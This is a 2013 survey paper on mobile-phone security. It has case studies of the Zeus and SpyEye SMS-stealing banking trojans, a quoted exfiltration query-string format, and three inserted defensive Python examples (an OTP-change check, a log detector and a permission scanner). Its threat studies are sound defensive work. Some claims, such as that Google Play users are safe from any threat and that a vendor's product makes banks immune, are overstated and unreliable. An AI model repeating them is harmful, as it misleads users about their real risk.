Security issues vs user awareness in mobile devices a survey



International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN 0976 – 6480 (Print), ISSN 0976 – 6499 (Online), Volume 4, Issue 3, April (2013), pp. 217-225, © IAEME. Impact Factor (2013): 5.8376 (Calculated by GISI), www.jifactor.com

SECURITY ISSUES VS USER AWARENESS IN MOBILE DEVICES: A SURVEY

Khaja Mizbahuddin Quadry, Research scholar, JNTUK, Kakinada, A.P, India
Dr. Mohammed Misbahuddin, Senior Technical Officer, C-DAC, Electronic city, Bangalore
Dr. A. Govardhan, Professor of CSE Dept and Director of Evaluation, JNTU, Hyderabad, A.P., India

ABSTRACT

Mobile devices help modern man stay connected. Mobile phones come in handy to serve this purpose; they use a radio link available in a geographical area to make and receive telephone calls without compromising on mobility. In recent years, mobile phones are no longer meant just for making calls; they are used for many more purposes. Their penetration rate has increased drastically, with a wide range of applications coming onto the market every day. The latest ones, the smartphones, serve an increasing number of activities besides storing sensitive data. This has made mobile phones a prime target for attacks. With the loss of a mobile phone, users lose all their important data besides losing a handsome amount; even messaging has become highly insecure. Hence this paper discusses the results of an online survey on the possible attacks on mobile devices. The paper also throws light on case studies of a variety of attacks that have been registered in the world of mobile phones.

Keywords: Security issues, Vulnerabilities, attacks, malware

1. INTRODUCTION

Mobile phones [1], otherwise called cell phones, make it possible to make and receive telephone calls over a radio link available in a geographical area while on the move. The cellular network provided by a mobile phone service provider in an area gives the cell phone access to the public telephone network. In addition to telephony, modern mobile phones also support text messaging, mail, internet access, short range wireless communications (IR, Bluetooth), business applications, gaming and photography. Hence, every common man in modern times finds a trustworthy companion in the mobile phone. It serves as a means to stay connected with family and friends, carry on business transactions, make emergency calls, etc. Records show that rural consumers, earning less than $1000 yearly, are the fastest growing group of cell phone subscribers worldwide. The expansion of the Indian cell phone industry presents a sharp contrast when compared to other industries. Present day smartphones are supported with more general computing capabilities. The cell phone industry registered a boost in December 2008. More than 10 million new subscribers were reported in comparison to the 8 million in 2007. The overall subscription in the cell phone industry grew by 48% in 2008 with 34 million customers. The past twenty years, from 1990 to 2010, recorded a growth in worldwide mobile phone subscriptions from 12.4 million to over 4.6 billion; the mobile phone penetrated and reached the bottom level of the economic pyramid in the developing economies. An exponential increase in the number of users has been recorded ever since mobile phones were first made available. The end of 2009 saw over 50 mobile operators with 10 million subscribers each and another 150 or more mobile operators with at least one million subscribers. The year 2010 recorded 4.6 billion mobile phone subscribers on the whole, a number that is expected to grow more rapidly in the years to come.

2.1 VULNERABILITIES and Security of Mobile Devices

With the widespread use of mobile phones for a wide range of applications, their security is a matter of serious concern.
Mobile phones are nowadays considered a very handy authentication medium by many websites [3] and by most online businesses. They send an SMS-based authentication code for ensuring authentication online, often in clear text involving no codes. As these mobile phones run the risk of being stolen, the fraudster can easily read the text or forward it to another number. This allows a cyber criminal to authenticate fraudulently. Vulnerability [2], though not so common a factor with desktops, is very serious in the case of mobile devices, given their small size and portability, which make them easy to steal or lose. The Emerging Cyber Threats 2011 report, presented at the Georgia Tech Cyber Security Summit 2011, talks about the rise of vulnerabilities in mobile browsers. The security experts say that device constraints and the tension between usability and security make it difficult to debug issues. As mobile browsers never get updated the way traditional web browsers do, and users continue using the same operating system and mobile browser as on the date of manufacture, the attackers gain a big advantage.

Attackers leverage a logic flaw in the mobile network standards and force mobile phones to send premium rate SMS messages, preventing them from receiving messages for long periods of time. Major actions like checking credit or voice mail, calling emergency numbers or customer support and even performing mobile banking are performed by these malicious applications, while they typically present themselves as a menu or application bearing the operator's name. The majority of cell phones give no notification of SIM Toolkit messages; some others wake up from sleep mode, but they neither indicate the receipt of any message nor show any message in the inbox. However, when automated error reports are sent, the users of some branded phones are notified that a message is being sent but cannot actually see any message. Only Nokia devices ask for confirmation before sending a SIM Toolkit response. But this option, asking for confirmation of SIM service actions, is off by default on phones configured by the operators. The most recent devices, like iPhones and Windows Mobile 6.x devices, notify the user that a message is being sent but offer no way to stop it. However, the sender can request a reply via SMS either directly to the sender's number or to the operator's message center. Online banking applications used through mobile browsers are also vulnerable to phishing websites that invite bank customers to enter their passwords or other credentials.
3 CASE STUDIES

We discuss some of the mobile phone attacks reported.

3.1 CASE STUDY: ZEUS TROJAN ATTACKS BANKS 2-FACTOR AUTHENTICATION

Zeus [4], a type of banking Trojan, has been reported to target mobile phones when users try to get their handsets upgraded to the two-factor authentication facility. Researchers at antivirus provider F-Secure reported that the Zeus MitMo attack appears to be similar to the one reported in Spain. In both cases the malware attempted to steal the mTANs (mobile transaction authentication numbers) used by a majority of European banks as an enhanced authentication service for their online customers. In this case the financial institutions send a one-time password by SMS, which is needed as a second-stage passcode to log in to online accounts. Zeus MitMo [5] creates a fraudulent field on the web page prompting users to provide their cell phone numbers and the type of handset they use. As there is no change in the URL, header or footer that hints at the untrusted security panel, users provide the information thinking that they are enhancing their security, little knowing that the notification is fraudulent. Thus activated, the app then monitors your SMS messages and sends the mTANs to the Zeus operator, making it possible to gain access to your bank account, as the operator now has your user name, password and mTAN: a combination that would clear your account of cash.

3.2 Case study: SpyEye banking Trojan: now with SMS hijacking capability

Another banking Trojan, SpyEye [7], has the capability to reroute the SMSes carrying the one-time passwords sent to victims' cell phones. This feature enables the Trojan to bypass all the protections adopted by the financial institutions. In yet another case, SpyEye tried to redirect and trick the victims into reassigning the cell phone number that they had registered with the bank to receive one-time passwords. The fraudulent pages injected into the online banking sessions make a false claim that the users have been assigned a unique telephone number and that they will receive a special SIM card in the mail shortly. Thus injected, SpyEye allows the fraudsters to receive all the SMS transaction verification codes for the hijacked account via their own telephone network. In this way they divert funds from the customer's account using the SMS confirmation system without acknowledgement and without triggering any fraud detection alarms.

How the attack works: The malware first gains access to the login information and logs into the account without being detected by the bank or the consumer. With the help of social engineering, the attacker obtains the confirmation code originally used to activate the consumer's mobile phone number with the bank. To do this the malware injects a page that the consumer assumes is from the bank. It says that, as a requirement of the new security system, unique telephone numbers are being issued to customers and that they will receive a special SIM card in the mail. The customers are prompted to reregister with the bank by entering the original confirmation code into the relevant field; of course, the Black Hats are ready to capture it. On getting the code, the fraudsters request that the old phone number be replaced with a new one, which is their own number. As soon as this is done, they divert the funds without alerting the customer or the bank to the fraud. These unauthorized withdrawals or expenditures are noticed only when the customer logs in to his account. This is enough to demonstrate that all out-of-band authentication systems, including SMS-based solutions, are not fool-proof. As the banks have started verifying transactions and subjecting them to various fraud detection systems, the fraudsters are using a combination of MITB (man in the browser injection) technology and social engineering to buy themselves more time. Once a computer has been identified as infected with SpyEye, such attacks can be checked with endpoint security that blocks MITB techniques. Only a layered approach to security can solve the issue; otherwise even the most sophisticated OOBA schemes would fail.
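One bank-side control against the number-reassignment step described in section 3.2, as an added example that is not part of the original paper: notify the previously registered number on every change, and hold transfers that are confirmed through a number registered only recently. The event format, account ids, phone numbers and the 72-hour window are all assumptions made for this sketch.

```python
from datetime import datetime, timedelta

HOLD_WINDOW = timedelta(hours=72)  # assumed policy value, not taken from the paper

# Constructed event stream: (timestamp, account, event type, details).
EVENTS = [
    ("2011-10-03T09:00:00", "ACC-1", "login", {}),
    ("2011-10-03T09:05:00", "ACC-1", "otp_phone_change",
     {"old": "+15555550101", "new": "+15555550199"}),
    ("2011-10-03T09:20:00", "ACC-1", "transfer",
     {"amount": 4200, "otp_sent_to": "+15555550199"}),
    ("2011-10-03T10:00:00", "ACC-2", "transfer",
     {"amount": 150, "otp_sent_to": "+15555550123"}),
    ("2011-10-09T12:00:00", "ACC-1", "transfer",
     {"amount": 60, "otp_sent_to": "+15555550199"}),
]


def review(events, hold_window=HOLD_WINDOW):
    """Return (notifications to old numbers, transfers held for manual review)."""
    last_change = {}  # account -> (time of change, newly registered number)
    notify_old, held = [], []
    # ISO 8601 timestamps sort correctly as strings.
    for ts, account, kind, info in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        if kind == "otp_phone_change":
            last_change[account] = (when, info["new"])
            # The legitimate customer still holds the old number, so the
            # alert reaches them even if their browser session is tampered with.
            notify_old.append((account, info["old"]))
        elif kind == "transfer" and account in last_change:
            changed_at, new_number = last_change[account]
            confirmed_by_new = info["otp_sent_to"] == new_number
            if confirmed_by_new and when - changed_at < hold_window:
                held.append((ts, account, info["amount"]))
    return notify_old, held


if __name__ == "__main__":
    notifications, held_transfers = review(EVENTS)
    for account, number in notifications:
        print(f"notify {number}: OTP number changed on {account}")
    for ts, account, amount in held_transfers:
        print(f"hold {account} transfer of {amount} at {ts}")
```

The transfer six days after the change passes because it falls outside the assumed window; a real deployment would tune that window against its own fraud data.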
3.21 First SpyEye Attack on Android Mobile Platform

SpyEye [8] is fast spreading in the mobile market, making the Android mobile platform its target. After Man in the Mobile attacks (MitMo/ZitMo) first emerged in late 2010, SpyEye, on Zeus' tracks, introduced its own hybrid desktop-mobile attacks (dubbed SPITMO).

Trojan: SymbOS/Spitmo

The SPITMO Trojan injects fraudulent fields for the user's mobile phone number and the IMEI of the phone into the bank's webpage, thus directing the user to provide them. The Trojan needs to be signed with a developer certificate in order to get installed on the user's phone. But as the developer's certificate is tied to the IMEI of the user's mobile phone, the malware authors request the IMEI along with the phone number on the bank's website. On receiving the new IMEIs, they request an updated certificate with the IMEIs of all the victims in order to sign and create a new installer. The delay in getting the new certificate from the developer explains why the SpyEye injected message states it can take up to three days for the certificate to be delivered. The cumbersome cycle used to circumvent Symbian's signing requirement makes the Trojan take up to three days to complete an attack:

• Ask the user for their device's IMEI
• Generate an appropriate certificate
• Release an updated installer

Trojan:DroidOS/Spitmo

The fraudsters find it unreasonable to wait three days just to steal a couple of SMSs. The Android OS provides a much more intuitive and modern approach to getting the desired treasure. Figure 3 has a pictorial overview of how MitMo evolved. The figure shows clearly that before 2011 Blackberry and Symbian were affected by the Zeus Trojan, but after April 2011 SpyEye affected Android, Blackberry and Symbian.

Figure 3: MITMO EVOLUTION

Trusteer reached the following analysis from a SpyEye compromised machine on July 24th:

Stage 1: MITB – web injects module (you know the drill...)

When a compromised mobile is used for transacting with the targeted bank, a message announces a "new" security measure, supposedly being enforced by the bank, which is mandatory in order to use its online banking service thereafter. It is presented as an Android application that is fully safe, protects the phone's SMS messages from being intercepted (there's irony for you…) and guards the user against any fraud.
Clicking the "set the application" button provides further instructions for installing the application:

Stage 2: Android (malicious) App installation

The user is directed to click on the URL: hxxp://

After the installation of the Android application on the compromised device, the application, named "System", is not visible. It's not a service, and it's not listed in any of the currently running applications. In order to locate this app, a bit of searching is required:

In order to complete the installation, the user is made to dial the number "325000"; the Android malware hijacks this call, presenting a malicious activation code that is to be submitted later on the "bank's site":

Following is the de-compiled code snippet found responsible for the "activation code" operation, but there is no reference to it in the application package (as of July 24).

Stage 3: Android secure application is a Trojan

After the successful installation, the Trojan intercepts all incoming SMSs and transfers them to the attacker C&C; the de-compiled code snippet given below creates a string for later use whenever an SMS is received:

"?sender=[SenderAddress]&receiver=[ReceiverAddress]&text=[MessageBody]"

The string structure formed above will later be appended, as a query string, to a GET HTTP request to be sent to the attacker's end.

There is a "Settings.xml" file (asset directory) within the app holding the configuration for the Trojan; "Settings.xml" defines:

• The transfer method, i.e. SMS or HTTP
• The attacker's drop zone URLs

Here's a snippet of the extracts from "Settings.xml":

Stage 4: SMS Spy Command & Control

Four domain names in the URLs in use were found not registered (yet!):;; and, SpyEye - the domain '' has been found 'hopping' around different IPs, in several locations around the world. The snippet from SpyEye's tracker history record for the domain over a three day period shows as follows:

Peeping around the attacker C&C reveals an unprotected (at the moment!) statistics page.

It's worth mentioning that the information stated above was produced on the attacker C&C when the Trojan was tested in action in the lab. The Sender 15555215556 and the Recipient 15555215554 refer to the two Android emulators used in the lab to simulate the attack (the corresponding HTTP traffic is presented above). As indicated in the page, the attack has yet to gain momentum, so consider this a warning. I'm pretty sure this is just the beginning so I'm tempted to say, "To be continued…"

SPITMO for Android loses the battle against Trusteer

It is high time that organizations acted and installed a desktop browser security solution in the multi-layered security profile they have been using. The banks that already offer Trusteer Rapport are automatically protected and are NOT vulnerable to this attack, even if the Trojan is downloaded. This is due to Rapport being supported by a feature that prevents SpyEye from installing on the customer's PC, thus terminating the attack before it takes hold. For those who are not using Rapport, Trusteer Pinpoint will detect and report the real-time victims as being infected with this variant of SpyEye when they attempt to log in to the bank's website. The attack is nullified by restricting the services available to these reportedly infected machines, such as disabling their ability to complete transactions. Finally, Trusteer Mobile for Android (either Secure Library or Secure Browser) will detect and block such attacks by preventing any malicious activity.
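The query-string structure quoted in Stage 3 gives network defenders something concrete to hunt for. The following is an added detection example, not code from the paper or from the analysed malware: it scans web-proxy log lines for requests whose query carries all three parameters with phone-number-shaped sender and receiver values. The log layout, the `.example` hosts and the two regular expressions are assumptions; the phone numbers are the lab emulator numbers quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names from the query string quoted in the case study.
EXFIL_PARAMS = {"sender", "receiver", "text"}
PHONE_RE = re.compile(r"^\+?\d{7,15}$")  # assumption: digits-only phone number
OTP_RE = re.compile(r"\b\d{4,8}\b")      # assumption: OTP/mTAN is 4 to 8 digits

# Constructed proxy log lines: "<timestamp> <client-ip> <method> <url>".
SAMPLE_LOG = """\
2011-07-24T10:02:11Z 10.0.0.23 GET http://dropzone.example/gate.php?sender=15555215556&receiver=15555215554&text=Your+mTAN+is+483920
2011-07-24T10:02:15Z 10.0.0.23 GET http://news.example/search?text=weather&lang=en
2011-07-24T10:03:40Z 10.0.0.41 GET http://dropzone.example/gate.php?Sender=15555215556&Receiver=15555215554&Text=hello
2011-07-24T10:04:02Z 10.0.0.57 POST http://shop.example/contact?sender=alice&receiver=support&text=hi
2011-07-24T10:05:00Z 10.0.0.23 GET http://cdn.example/app.js
malformed line
"""


def sms_fields(url):
    """Return the decoded SMS fields if the URL matches the pattern, else None."""
    query = parse_qs(urlsplit(url).query)
    # Parameter names are compared case-insensitively.
    fields = {name.lower(): values[0] for name, values in query.items()}
    if not EXFIL_PARAMS.issubset(fields):
        return None
    # Contact forms reuse these names; requiring phone-shaped values cuts noise.
    if not (PHONE_RE.match(fields["sender"]) and PHONE_RE.match(fields["receiver"])):
        return None
    return fields


def scan(log_text):
    """Return one finding per log line that looks like a forwarded SMS."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting the scan
        timestamp, client, _method, url = parts
        fields = sms_fields(url)
        if fields is None:
            continue
        findings.append({
            "timestamp": timestamp,
            "client": client,
            "host": urlsplit(url).hostname,
            # The message body is deliberately not copied into the finding.
            "otp_like": bool(OTP_RE.search(fields["text"])),
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Clients that appear in the findings are candidates for handset triage, and a finding with `otp_like` set suggests a one-time password may already have left the network.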
3.22 SPY EYE BANK TROJAN HIDES ITS FRAUD FOOTPRINT

Another, nastier version of SpyEye [9] has been detected with the ability to hide all fraudulent transactions from victims and was found allegedly targeting the major UK banks. This SpyEye version is a tweak of the Zeus crimeware kit that grabs web-form data within browsers. This new Trojan doesn't intercept or divert email messages; rather, it hides the fraudulent transactions, masks the amount of the transaction, and puts forward a fake balance, ensuring that victims are unaware of anything being amiss on their account. Its work can be summarized as:

1. SpyEye steals the debit card data by employing a man-in-the-browser attack on an online banking session.
2. The fraud is committed with the debit card data.
3. SpyEye initiates a post-transaction attack and hides the fraudulent transactions from the victim when he logs in to his account the next time.

Here's a detailed description of how it goes down:

Step 1 – Malware Post-Login Attack - Credentials Stolen:

a. The victim's machine is first infected with any Man in the Browser malware (e.g. Zeus, SpyEye, Carberp), with a suitable configuration.
b. The fraudulently configured malware asks the customer for debit card data during the login phase (HTML injection), e.g. card number, CVV2, month and year of expiry, etc.

Step 2 – Fraudster Commits Fraudulent Activity:

c. The cybercriminals then commit card-not-present transaction fraud by making a purchase or transferring money over the telephone or the internet using the customer's debit card details.
d. The fraudulent transaction details are immediately fed in to the malware control panel by the fraudster.

Step 3 – Malware Post-Transaction Attack with Fraud Hidden from View:

Figure 4: MitMo Attack Cycle
3.32 Case Study: Android Trojan records calls

Cyber criminals [11] have increased the functionality of Android Trojans. Earlier versions of mobile malware strains for Google's mobile platform were able to log the duration and numbers of incoming and outgoing calls. The new malware goes a step further by capturing the whole content of conversations and storing them on the SD-slot memory card of infected Android phones. The hackers then upload these conversations to a server, according to tests carried out on the malware in a closed environment by security researchers at CA. On installation, the malware drops a configuration file containing the key information about the remote server and the parameters. This as-yet-unnamed malware cannot install by itself. It needs to be installed by victims who consider it to be a prototype of some sort, a game, or a tool that they can use against their spouses to keep track of their activities. The victims, tricked into installing it, would need to agree to install the application and grant it permissions to record audio, read the state of the phone and prevent it from sleeping.

3.31 NEW Drive-By Android Trojan Attacks Mobile Users

Android.Notcompatible [11], an Android Trojan horse program that gets installed via a partial drive-by download, has been identified as a threat by Symantec. Though Symantec gives Android.Notcompatible its lowest risk level, Very Low, the main concern is that other hackers might copy the technique for use in other attacks. Drive-by downloads (malware that installs itself without the user's knowledge) typically occur when a website is visited. Android.Notcompatible poses as a genuine system update under the name "com.Security.Update". The images below show the download and installation. Taking the program to be a genuine update, the infected users approve installation. After being installed on a phone, Android.Notcompatible monitors all incoming and outgoing data, including personal data, and sends copies to the attacker through proxy code. Android.Notcompatible spreads via URL redirects injected into the HTML of innocent bystander sites. Users who allow installation from unknown sources are most susceptible. Users who download apps from Google Play are safe from this or any other threat. The following sites have been identified as Android.Notcompatible hosts by Symantec. (The "http" part of the addresses is bracketed to prevent accidental launches of infected sites.):

• [http://]
• [http://]
• [http://]
• [http://]androidonlinefix.info

3.4 Case Study: Scumbags get sneaky with new self-robbery Trojan

The malware-peddlers [12] have developed a particularly sneaky banking Trojan equipped with self-robbery tricks that trap victims into transferring funds into accounts controlled by cyber crooks or their partners. The users of infected machines, on logging in to the bank site, get a fake message alerting them to a mistaken credit to their account and asking them to return the said amount to unfreeze their account. The Trojan falsely inflates displayed account balances on infected machines, besides offering a pre-filled online transfer form, in order to make the ploy more plausible. All this makes the victim trust the message and transfer the said amount without getting it confirmed by the bank. While previous banking Trojans, like the URL Zone Trojan, displayed fake balances on infected machines, this latest strain of malware is an evolution of this line of attack. As the period of time involved in banking fraud increases the risk of the fraud being tracked down, the fraudsters find it safer to trick victims into transferring funds themselves rather than employing money mules to force entry to the compromised accounts. Fraudsters can thus quickly loot accounts before the compromised accounts are suspended or login credentials changed.
4 CONCLUSIONS

This survey concludes that mobile phones are not secure unless the user is well aware of the risks. They can be attacked and used for various fraudulent purposes that users do not normally identify. This paper explores some vulnerabilities and explains how they may be exploited. Finally, the case studies expose the consequences of attacks on mobile phones by malware. The lack of security awareness [15] among cell phone users and their carelessness are the two prominent risk factors that make users fall prey to fraudsters. It is extremely important to understand that a smartphone is far more than just a phone and cannot be treated like an ordinary one. Unlike previous generations of cell phones, which were least susceptible to Bluetooth hijacking, modern smartphones, equipped with Bluetooth or internet features, are prone to the same risks as PCs. Given the convergence between PCs and cell phones, new attack vectors will increasingly be exploited by fraudsters as online banking services use these devices as second authentication factors.

Recommendations for secure mobile banking:

• Check the rating, user reviews, and comments for each mobile application you download. Avoid low rated or new applications and those with bad reviews.
• Carefully evaluate the permissions requested by Android applications when you install them. Applications that ask for access to text messages and other sensitive information should raise a red flag and be researched further before you download them.
• Have your PC protected with online banking security software such as Trusteer Rapport, which can be downloaded from your bank's website. This software rules out the possibility of MitMo attacks by restricting fraudsters from controlling the web channel.
• Regularly install updates on your mobile device.
• Enable access protection measures such as a PIN or password (if possible). Configure the smartphone to lock automatically after a minute or so of being idle.
• Before installing or using new smartphone apps or services, check their reputation. Only install applications from trusted sources.
• Pay attention to the security permissions requested by every application and service you install.
• Keep your operating system and software applications up to date.
• Disable features not in use: Bluetooth, infrared or Wi-Fi.
• If you have Bluetooth enabled, set your device to be hidden and password-protect it.
• Make regular backup copies of your important files.
• Encrypt sensitive information whenever possible.
• Use call and SMS encryption software.
• Whenever possible, do not store sensitive information on the smartphone. Make sure it is not cached locally.
• Erase all information from the smartphone once you get rid of it.
• In the event your phone is lost or stolen, inform your service provider and give them your device's IMEI number to block it.
• You can also use remote or automatic deletion of data (after several failed login attempts).
• Monitor the smartphone for anomaly detection.
• Check your account activity frequently to detect fraud.
• Be aware of the risks associated with these devices and use them correctly.
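The advice to evaluate requested permissions, and the permission set listed for the call-recording Trojan in section 3.32, can be checked mechanically. The following added example (not from the paper) reads a decoded, text-form AndroidManifest.xml and flags permission combinations that match the behaviours in the case studies. The rule names, package names and sample manifests are constructed for illustration; the permission strings are standard Android permission names, and the manifest inside an APK is binary XML that must be decoded to text first.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Rule names and wording are this example's own; each combination maps to a
# behaviour described in the case studies.
RULES = [
    ("sms-to-http", {P + "RECEIVE_SMS", P + "INTERNET"},
     "can read incoming SMS (OTP/mTAN) and send it to a remote server"),
    ("sms-to-sms", {P + "RECEIVE_SMS", P + "SEND_SMS"},
     "can read incoming SMS and forward it by SMS"),
    ("call-recorder", {P + "RECORD_AUDIO", P + "READ_PHONE_STATE", P + "WAKE_LOCK"},
     "can record audio during calls while keeping the device awake"),
]


def build_manifest(package, permissions):
    """Build a constructed sample manifest for the demo and tests."""
    uses = "".join(
        f'<uses-permission android:name="{P}{name}"/>' for name in permissions
    )
    return (
        '<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
        f'package="{package}">{uses}<application/></manifest>'
    )


# Constructed samples, not taken from any real application.
SECURE_SMS = build_manifest("com.example.securesms",
                            ["RECEIVE_SMS", "INTERNET", "SEND_SMS"])
FLASHLIGHT = build_manifest("com.example.flashlight", ["CAMERA"])
CALL_NOTES = build_manifest("com.example.callnotes",
                            ["RECORD_AUDIO", "READ_PHONE_STATE", "WAKE_LOCK",
                             "WRITE_EXTERNAL_STORAGE"])


def requested_permissions(manifest_xml):
    """Return the set of permission names a decoded manifest requests."""
    try:
        root = ET.fromstring(manifest_xml)
    except ET.ParseError as exc:
        raise ValueError(f"not a decoded text manifest: {exc}") from exc
    permissions = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for element in root.iter(tag):
            name = element.get(ANDROID_NS + "name")
            if name:  # ignore entries without an android:name attribute
                permissions.add(name.strip())
    return permissions


def audit(manifest_xml):
    """Return the names of all rules whose permission set is fully requested."""
    permissions = requested_permissions(manifest_xml)
    return [name for name, needed, _why in RULES if needed <= permissions]


if __name__ == "__main__":
    reasons = {name: why for name, _needed, why in RULES}
    for label, manifest in [("securesms", SECURE_SMS), ("flashlight", FLASHLIGHT),
                            ("callnotes", CALL_NOTES)]:
        hits = audit(manifest)
        print(label, "->", [f"{h}: {reasons[h]}" for h in hits] or "no rule matched")
```

A match is a prompt for the further research the recommendations call for, not proof of malice, since legitimate messaging and recording apps request the same permissions.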
REFERENCES

[1] [2] [3] [4] [5] [6] - United States [7] [8] [9] [10] [11] [12] [13] [14] [15]
[16] K. Sangeetha and Dr. K. Ravikumar, "A Framework for Practical Vulnerabilities of the Tor (The Onion Routing) Anonymity Network", International Journal of Computer Engineering & Technology (IJCET), Volume 3, Issue 3, 2012, pp. 112 - 120, ISSN Print: 0976 – 6367, ISSN Online: 0976 – 6375
[16] A. Edwinrobert and Dr. M. Hemalatha, "Behavioral and Performance Analysis Model for Malware Detection Techniques", International Journal of Computer Engineering & Technology (IJCET), Volume 4, Issue 1, 2013, pp. 141 - 151, ISSN Print: 0976 – 6367, ISSN Online: 0976 – 6375